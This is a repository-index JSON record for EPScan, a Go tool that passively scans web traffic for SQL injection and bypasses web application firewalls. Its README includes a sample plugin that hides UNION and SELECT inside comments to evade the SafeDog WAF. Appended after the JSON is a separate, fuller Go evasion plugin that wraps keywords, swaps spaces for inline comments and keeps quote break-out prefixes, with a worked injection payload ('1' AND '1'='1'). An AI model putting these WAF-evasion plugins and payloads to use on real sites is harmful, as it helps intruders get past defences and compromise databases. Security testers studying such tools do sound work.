{"id":13841804,"url":"https://github.com/ExpLangcn/EPScan","last_synced_at":"2025-07-11T13:32:35.542Z","repository":{"id":63343715,"uuid":"567090181","full_name":"ExpLangcn/EPScan","owner":"ExpLangcn","description":"Passively collects assets and automatically runs SQL injection detection (plugin-based, automatic Bypass), XSS detection, RCE detection and sensitive-information detection","archived":true,"fork":false,"pushed_at":"2023-11-29T06:37:09.000Z","size":2565,"stargazers_count":194,"open_issues_count":1,"forks_count":18,"subscribers_count":11,"default_branch":"main","last_synced_at":"2024-08-05T17:29:07.086Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ExpLangcn.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-11-17T03:26:53.000Z","updated_at":"2024-08-04T14:16:50.000Z","dependencies_parsed_at":"2023-11-29T07:42:24.201Z","dependency_job_id":null,"html_url":"https://github.com/ExpLangcn/EPScan","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ExpLangcn%2FEPScan","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ExpLangcn%2FEPScan/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ExpLangcn%2FEPScan/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ExpLangcn%2FEPScan/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ExpLangcn","download_url":"https://codeload.github.com/ExpLangcn/EPScan/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225729679,"owners_count":17515154,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:21.486Z","updated_at":"2024-11-21T12:30:25.777Z","avatar_url":"https://github.com/ExpLangcn.png","language":"Go","readme":"**No longer updated (archived). Please follow the follow-up project.**\n\n**[Follow me on Twitter](https://twitter.com/ExpLang_Cn) to keep up with my updates.**\n\n----\n\n# EPScan\nPassively collects assets and automatically runs SQL injection detection (plugin-based, automatic Bypass), XSS detection, RCE detection and sensitive-information detection.\n\n## Note\n\n~~**Because of how Go's plugin mechanism works, Bypass plugins are not supported on Windows; Mac and Linux are supported. Download the Plus plugin build for your OS, otherwise the program will error out.**~~\n\n~~**Only Linux and Mac are supported for now. The error \"panic: plugin: not implemented\" means your OS does not support Bypass plugins.**~~\n\n**Bypass plugins are now loaded through an interpreter built into the program.**\n\n## Features\n- [x] ~~Port of SqlMap's detection modes~~\n- [x] ~~Automatic Bypass for SQL injection~~\n- [x] ~~Boolean-based blind SQL injection over GET/POST~~\n- [x] ~~Error-based SQL injection in request headers and GET/POST parameters~~\n- [x] ~~Automatic loading of Bypass plugins for SQL injection~~\n- [x] ~~Plugin-based payload rewriting~~\n- [x] ~~Plugin-based Bypass mode~~\n- [ ] Automatic Bypass plugin updates\n- [ ] XSS vulnerability detection\n- [ ] RCE vulnerability detection\n- [ ] Sensitive-information detection\n- [ ] Active crawler + scanning\n\n## Screenshots\n\n\u003cimg src=https://user-images.githubusercontent.com/52586866/202387755-55cb5ad6-c4ea-4cf7-8eb5-be87ab20398a.png width=80% /\u003e\n\n\u003cimg src=https://user-images.githubusercontent.com/52586866/202387795-09e707fc-4c37-48e5-9584-5595dcc0a27e.png width=80% /\u003e\n\n\u003cimg src=https://user-images.githubusercontent.com/52586866/202387548-8b1dfe2b-0b15-4ceb-8385-f0e8d0779529.png width=80% /\u003e\n\n\u003cimg src=https://user-images.githubusercontent.com/52586866/202387599-72faf4e8-d407-4b52-9228-74503ebbad8a.png width=80% /\u003e\n\n## Command-line options\n\n**You must download the crt and install the certificate, otherwise HTTPS traffic cannot be scanned.**\n\n```\n./EPScan -h\n\nUsage of /EPScan:\n  -Wlist string\n        Only scan the hosts listed in the file, one per line, without the http scheme\n\n  -blist string\n        Skip the hosts listed in the file, one per line, without the http scheme\n\n  -deep bool      // off by default; off is faster but gives slightly more false positives\n        Deep scan (slower, more accurate)\n\n  -pdelay string  // must include the http scheme, see the example\n        Forward traffic (forwards the program's traffic to the given port, e.g. Burp on 8080: http://127.0.0.1:8080)\n\n  -pdir string    // loads every plugin in the given directory; no Bypass by default\n        Load all Bypass plugins from the given directory\n\n  -plist string   // prints plugin information; defaults to the plugins under \"plus/\"\n        List plugins and their details (default \"plus/\")\n\n  -port string    // port to listen on\n        Listening port (default \"8899\")\n\n  -ptest string   // tests the given plugin and prints the original and the processed payload\n        Test a plugin\n\n  -run bool       // start passive scanning, e.g. ./EPScan -pdir plus/ -port 8899 -run\n        Start passive scanning\n\n  -iflength bool  // off by default\n        Filter out results whose Length is -1 (fewer false positives)\n\n  -th int         // default 10\n        Number of request threads\n```\n\n**Start passive scanning**\n\n**You must download the crt and install the certificate, otherwise HTTPS traffic cannot be scanned.**\n\n```\n./EPScan -port 8899 -run\n```\n\n**Start passive scanning and load a directory of Bypass plugins**\n\n```\n./EPScan -pdir plus/ -port 8899 -run\n```\n\n## Writing SQL injection Bypass plugins\n\n**WeChat: backxyh. Contribute more than 5 plugins to join the closed beta group (early access to test builds and the latest release, plus a large collection of shared Bypass techniques and plugins).**\n\n### Example:\n\n[**View the sample plugin**](https://github.com/ExpLangcn/EPScan/blob/main/plus/unionalltounion.go)\n\n```\npackage main // the package name must be \"main\"\n\nimport (\n\t\"strings\"\n)\n\nvar ( // these three global variables are required\n\tPlus_Author   = \"ExpLang\"        // plugin author\n\tPlus_Version  = \"1.0\"            // plugin version\n\tPlus_Describe = \"Bypass_SafeDog\" // plugin description\n)\n\n// The entry function must be named \"Bypass\" (case-sensitive). It takes a string and returns a string:\n// the original payload goes in, the processed payload comes out.\nfunc Bypass(Value string) string {\n\tvar Value_Bypass string\n\tvar bypass_SafeDog_str = \"/*x^x*/\"\n\tValue_Bypass = strings.Replace(Value, \"UNION\", bypass_SafeDog_str+\"UNION\"+bypass_SafeDog_str, -1) // replace every occurrence of the substring\n\tValue_Bypass = strings.Replace(Value_Bypass, \"SELECT\", bypass_SafeDog_str+\"SELECT\"+bypass_SafeDog_str, -1)\n\n\treturn Value_Bypass // return the processed payload\n}\n\nfunc INFO() []string {\n\treturn []string{Plus_Author, Plus_Version, Plus_Describe} // plugin information\n}\n```\n\n### List the plugins:\n\n```\n./EPScan -pluslist\n\n+----+---------+---------+------------------------------+-------------------------------+\n| ID | AUTHOR  | VERSION |           DESCRIBE           |             PATH              |\n+----+---------+---------+------------------------------+-------------------------------+\n| 1  | ExpLang | 1.0     | Bypass_SafeDog               | plus/bypass_SafeDog.go        |\n| 2  | ExpLang | 1.0     | Replace \"'\" with \"%EF%BC%87\" | plus/bypass_apostrophemask.go |\n| 3  | ExpLang | 1.0     | Test/demo                    | plus/bypass_name.go           |\n+----+---------+---------+------------------------------+-------------------------------+\n```\n\n### Test a plugin\n\n```\n./EPScan -ptest \"plus/bypass_name.go\"\n```\n\n----\n\n#### 😄 I’m ExpLang [**Twitter**](https://twitter.com/ExpLang_Cn), feel free to follow!\n","funding_links":[],"categories":["Go"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FExpLangcn%2FEPScan","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FExpLangcn%2FEPScan","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FExpLangcn%2FEPScan/lists"}
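The README above lays out the plugin contract (package `main`, the three `Plus_*` globals, `Bypass(string) string` and `INFO() []string`) and its sample wraps `UNION` and `SELECT` with `strings.Replace`. The plugin below is an added example written for this page, not code from the EPScan repository or its author. It follows the same contract but goes further than the sample: keywords are matched case-insensitively on word boundaries (so `union` and `Union` are caught but `reunion` is not), whitespace between SQL tokens is replaced by inline comments, string literals inside the payload are left untouched so data such as `'a or b'` is not rewritten, and a break-out prefix such as `1'` or `admin'` is kept verbatim. The author name, the keyword list, the comment tokens and the plugin file name are assumptions for illustration; which WAF, if any, these tokens get past is not claimed.

```go
package main // EPScan plugins must live in package "main" (README requirement)

import (
	"regexp"
	"strings"
)

// Plugin metadata required by the EPScan plugin contract described in the README.
var (
	Plus_Author   = "example"                   // hypothetical author
	Plus_Version  = "1.0"                       // plugin version
	Plus_Describe = "Bypass_Comment_QuoteAware" // inline comments around keywords and instead of spaces
)

// Comment tokens inserted by this example (assumed; whether they defeat a given WAF is not claimed).
const (
	keywordWrap = "/*x^x*/" // same wrapper the README sample puts around UNION/SELECT
	spaceSub    = "/**/"    // stands in for whitespace between SQL tokens
)

var (
	// Keywords to wrap, matched case-insensitively on ASCII word boundaries.
	keywordRe = regexp.MustCompile(`(?i)\b(union|select|from|where|and|or|order|by|group|having|sleep|benchmark)\b`)
	spaceRe   = regexp.MustCompile(`\s+`)
	// A payload that starts with optional word characters and a quote (1', admin', ', x") is
	// breaking out of the application's own string literal; that prefix is kept verbatim.
	prefixRe = regexp.MustCompile(`^\w*['"]`)
)

// segment is a run of the payload that is either SQL code or a string literal.
type segment struct {
	text string
	code bool // true when text is SQL outside a string literal
}

// splitSegments separates a payload into code and literal runs. Inside a literal a
// backslash escapes the next byte and a doubled delimiter ('') counts as an escaped quote.
func splitSegments(payload string) []segment {
	var segs []segment
	var cur strings.Builder
	flush := func(code bool) {
		if cur.Len() > 0 {
			segs = append(segs, segment{cur.String(), code})
			cur.Reset()
		}
	}
	start := 0
	if p := prefixRe.FindString(payload); p != "" {
		segs = append(segs, segment{p, false}) // break-out prefix, never rewritten
		start = len(p)
	}
	var quote byte // 0 while scanning code, otherwise the open literal's delimiter
	for i := start; i < len(payload); i++ {
		c := payload[i]
		if quote == 0 {
			if c == '\'' || c == '"' {
				flush(true)
				quote = c
			}
			cur.WriteByte(c)
			continue
		}
		cur.WriteByte(c)
		switch {
		case c == '\\' && i+1 < len(payload): // backslash escape inside the literal
			i++
			cur.WriteByte(payload[i])
		case c == quote && i+1 < len(payload) && payload[i+1] == quote: // doubled quote
			i++
			cur.WriteByte(payload[i])
		case c == quote: // closing delimiter
			quote = 0
			flush(false)
		}
	}
	flush(quote == 0) // trailing code, or an unterminated literal the application will close
	return segs
}

// transformCode rewrites one code run: wrap keywords, then replace whitespace runs.
func transformCode(code string) string {
	code = keywordRe.ReplaceAllStringFunc(code, func(kw string) string {
		return keywordWrap + strings.ToUpper(kw) + keywordWrap
	})
	return spaceRe.ReplaceAllString(code, spaceSub)
}

// Bypass is the entry point EPScan calls: original payload in, processed payload out.
// A payload that already carries the wrapper is returned unchanged, so running it twice is harmless.
func Bypass(Value string) string {
	if strings.Contains(Value, keywordWrap) {
		return Value
	}
	var out strings.Builder
	for _, s := range splitSegments(Value) {
		if s.code {
			out.WriteString(transformCode(s.text))
		} else {
			out.WriteString(s.text)
		}
	}
	return out.String()
}

// INFO is the second required function; EPScan shows these values in its plugin listing.
func INFO() []string {
	return []string{Plus_Author, Plus_Version, Plus_Describe}
}
```

Save it in the plugin directory (for example as `plus/bypass_comment_quoteaware.go`, an assumed name) and check it with `./EPScan -ptest plus/bypass_comment_quoteaware.go`, which the README says prints the original and the processed payload. With this plugin `1' AND '1'='1` becomes `1'/**//*x^x*/AND/*x^x*//**/'1'='1`: the `AND` is wrapped, the spaces are gone, and the quoted parts are untouched. The quote tracking is a heuristic: the plugin never sees the application's own SQL, so it assumes a payload that opens with word characters and a quote is closing a literal the application opened. That covers the usual `1' AND ...` and `' UNION ...` shapes but not every injection context, which is exactly the kind of edge the `-ptest` flag exists to check before pointing a plugin directory at a target.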